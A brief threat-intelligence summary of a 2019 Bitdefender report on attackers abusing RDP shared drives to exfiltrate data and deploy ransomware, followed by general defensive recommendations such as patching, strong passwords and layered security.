RDP Abuse and Swiss Army Knife Tool Used to Pillage, Encrypt and Manipulate Data (Dec 18, 2019)
Bitdefender has reported on a recently discovered technique being leveraged by attackers. The actors are abusing a legitimate feature in Remote Desktop Protocol (RDP). The RDP client has the ability to share a drive letter on their machine acting as a resource on the local virtual network. This shared directory was used as a data exfiltration mechanism over RDP. An off-the-shelf component placed on the “tsclient1” network location could be executed using cmd.exe or explorer.exe. Ransomware appears to be used as a payload. The actors have leveraged at least $150,000 in cryptocurrency so far at the time of this writing.
Recommendation: Ensure that your server is always running the most current software version. Additionally, maintaining secure passwords for RDP and other remote access systems is paramount. Intrusion detection systems and intrusion prevention systems can also assist in identifying and preventing attacks against your company's network. Furthermore, always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe). In the case of ransomware infection, the affected systems should be wiped and reformatted, even if the ransom is paid. Other machines on the same network should be scanned for other potential infections.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.